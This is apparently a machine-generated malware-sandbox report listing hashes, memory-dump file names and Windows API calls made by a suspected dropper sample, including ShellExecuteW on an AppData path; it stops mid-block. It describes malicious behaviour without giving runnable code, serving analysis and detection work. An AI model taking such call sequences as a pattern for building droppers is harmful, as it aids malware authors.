                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: c7b88453d07393fdeb677dd88dae3b78eedf61d9a77563a8484cf44dd47aba53
                                                                                                                                                                      • Instruction ID: e1a0b165b1ec2cfc9f877bfb9dcbf2309f9cd93107b4533ef6724984480a2cde
                                                                                                                                                                      • Opcode Fuzzy Hash: c7b88453d07393fdeb677dd88dae3b78eedf61d9a77563a8484cf44dd47aba53
                                                                                                                                                                      • Instruction Fuzzy Hash: 2A913370D00229CBDF28CFA8C844BADBBB1FF44305F15816AD856BB281C779A986DF45
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4cabeb7f0ac32f2dbf9dc68cead907101fe434422346ba396ff6a4e1791945c5
                                                                                                                                                                      • Instruction ID: 37e0958252648d02cff52253bcfdfe32609a82ce416cf41b7e12165f3d842d3a
                                                                                                                                                                      • Opcode Fuzzy Hash: 4cabeb7f0ac32f2dbf9dc68cead907101fe434422346ba396ff6a4e1791945c5
                                                                                                                                                                      • Instruction Fuzzy Hash: 3A814571D04228CFDF24CFA8C944BADBBB1FB44305F25816AD456BB281C7789A96CF45
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f55e986299dffb9fb67cabe2458bae2281fa53825949e9f46481d15298381b70
                                                                                                                                                                      • Instruction ID: badab6c45d1579aebeb642038854a5de2f2e9fe133ee6b5741b25705484aa732
                                                                                                                                                                      • Opcode Fuzzy Hash: f55e986299dffb9fb67cabe2458bae2281fa53825949e9f46481d15298381b70
                                                                                                                                                                      • Instruction Fuzzy Hash: 9A816731D04228DBDF24CFA8C844BADBBB0FF44305F21856AD856BB281D7796A86DF45
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f41dab0dbba64a540d9551cbe01a5d5f92f5b5317ed5009a96d4fab12e5207c8
                                                                                                                                                                      • Instruction ID: 661ade8e8f79e5a6005bf83598ee02ccf2e60dcd73e05bd09c6951c965a298a8
                                                                                                                                                                      • Opcode Fuzzy Hash: f41dab0dbba64a540d9551cbe01a5d5f92f5b5317ed5009a96d4fab12e5207c8
                                                                                                                                                                      • Instruction Fuzzy Hash: DC713471D00228CFDF24CFA8C944BADBBB1FB48305F25816AD846B7281D7799A96DF44
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 27edfd15d06558e6ae5c336135e48ef31f60b588342a43fc4fa727b2134efb1b
                                                                                                                                                                      • Instruction ID: d698c6254bb21e10e407083827577a24b67810c044b8fa2104370265796c5121
                                                                                                                                                                      • Opcode Fuzzy Hash: 27edfd15d06558e6ae5c336135e48ef31f60b588342a43fc4fa727b2134efb1b
                                                                                                                                                                      • Instruction Fuzzy Hash: C3714571D04228CFDF28CFA8C844BADBBB1FB48305F25816AD856B7281C7785956DF45
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: e3d564453c2182c562a1b6ec6fca3cbebf624123e7e397cf1c44fef12d2f9579
                                                                                                                                                                      • Instruction ID: 46d523a662c7919231ebab16691ba05348c69527c8d8aa00e9837d4009f14a99
                                                                                                                                                                      • Opcode Fuzzy Hash: e3d564453c2182c562a1b6ec6fca3cbebf624123e7e397cf1c44fef12d2f9579
                                                                                                                                                                      • Instruction Fuzzy Hash: 28714571D00228DBDF28CF98C944BADBBB1FF44305F21816AD856BB281C778AA56DF44
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00403203
                                                                                                                                                                        • Part of subcall function 0040336E: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C
                                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403119,00000004,00000000,00000000,0040A230,?,00403093,000000FF,00000000,00000000,?,?), ref: 00403236
                                                                                                                                                                      • SetFilePointer.KERNELBASE(00A434AA,00000000,00000000,00414EF0,00004000,?,00000000,00403119,00000004,00000000,00000000,0040A230,?,00403093,000000FF,00000000), ref: 00403331
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer$CountTick
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1092082344-0
                                                                                                                                                                      • Opcode ID: 1d6b410ec908590b26d0e6386832776f3ccc0075e6ffb3c2499094a24fe2f275
                                                                                                                                                                      • Instruction ID: 2f989109dca0f14896005150ea4b142ee5491df85de4bcb3d025a191183ef828
                                                                                                                                                                      • Opcode Fuzzy Hash: 1d6b410ec908590b26d0e6386832776f3ccc0075e6ffb3c2499094a24fe2f275
                                                                                                                                                                      • Instruction Fuzzy Hash: 6F317A72500215DFCB109F69EEC496A3BAAF74475A714423FE900B22E0CB799D05DB9D
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE
                                                                                                                                                                        • Part of subcall function 004052E2: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
                                                                                                                                                                        • Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
                                                                                                                                                                        • Part of subcall function 004052E2: lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
                                                                                                                                                                        • Part of subcall function 004052E2: SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
                                                                                                                                                                        • Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
                                                                                                                                                                        • Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
                                                                                                                                                                        • Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                                                                                                                                      • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 334405425-0
                                                                                                                                                                      • Opcode ID: 8fcd44a165ceb9b3c7ca3aadaa3b6318a37a053de054dbdc544eae6363f814e6
                                                                                                                                                                      • Instruction ID: be163213bf01efc0596bf906ca0f1611b6abe1a57da7fca01b5cdd0d3cce8cbe
                                                                                                                                                                      • Opcode Fuzzy Hash: 8fcd44a165ceb9b3c7ca3aadaa3b6318a37a053de054dbdc544eae6363f814e6
                                                                                                                                                                      • Instruction Fuzzy Hash: 4921C631900219EBCF20AFA5CE48A9E7E71BF00354F60427BF501B51E1CBBD8A81DA5E
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004064C6: FindFirstFileW.KERNELBASE(76F93420,00426798,00425F50,00405C88,00425F50,00425F50,00000000,00425F50,00425F50,76F93420,?,76F92EE0,00405994,?,76F93420,76F92EE0), ref: 004064D1
                                                                                                                                                                        • Part of subcall function 004064C6: FindClose.KERNEL32(00000000), ref: 004064DD
                                                                                                                                                                      • lstrlenW.KERNEL32 ref: 0040222A
                                                                                                                                                                      • lstrlenW.KERNEL32(00000000), ref: 00402235
                                                                                                                                                                      • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 0040225E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1486964399-0
                                                                                                                                                                      • Opcode ID: f0a18f43b2fd03918ce55f1a207086b2750e482e6a70c5afb59815244b6eb2cd
                                                                                                                                                                      • Instruction ID: c84e55253e39239becd36fe695d6eaeea1e53b9ed95ff09ccc99126e74603a36
                                                                                                                                                                      • Opcode Fuzzy Hash: f0a18f43b2fd03918ce55f1a207086b2750e482e6a70c5afb59815244b6eb2cd
                                                                                                                                                                      • Instruction Fuzzy Hash: C011707190031896CB10EFF98E4999EB7B8AF14314F10847FA905FB2D9D6B8D9418B59
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                                                      • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                                                                                                                                      • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,artikulationer\Udsorteringerne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Enum$CloseOpenValue
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 167947723-0
                                                                                                                                                                      • Opcode ID: 6484ca5ed5e76b4549c4ba381c39e577598ee1135ee5e1483c34ecd9ae314918
                                                                                                                                                                      • Instruction ID: f7d1df95d760c65b2fa1112c316253173fa515e4752bf04adbc10342b079e70f
                                                                                                                                                                      • Opcode Fuzzy Hash: 6484ca5ed5e76b4549c4ba381c39e577598ee1135ee5e1483c34ecd9ae314918
                                                                                                                                                                      • Instruction Fuzzy Hash: 12F08171A00204EBEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69
                                                                                                                                                                      APIs
                                                                                                                                                                      • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable,?), ref: 00401E52
                                                                                                                                                                      Strings
                                                                                                                                                                      • C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable, xrefs: 00401E3B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExecuteShell
                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable
                                                                                                                                                                      • API String ID: 587946157-550679374
                                                                                                                                                                      • Opcode ID: abdb6d04a8628e8e10e6f0e4e307bd878a3efa8eec47d48165f605e3d5e5f129
                                                                                                                                                                      • Instruction ID: 6f03a3129deb64bde54e8dcd59ef9069cb9fc2feb89592f518e75193bcf3d7b7
                                                                                                                                                                      • Opcode Fuzzy Hash: abdb6d04a8628e8e10e6f0e4e307bd878a3efa8eec47d48165f605e3d5e5f129
                                                                                                                                                                      • Instruction Fuzzy Hash: ACF0C236B00100AACB11AFB99E4AEAD33B9AB44724B240577F901F74D5DAFC89419618
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,0040A230,?,00403093,000000FF,00000000,00000000,?,?), ref: 0040310C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
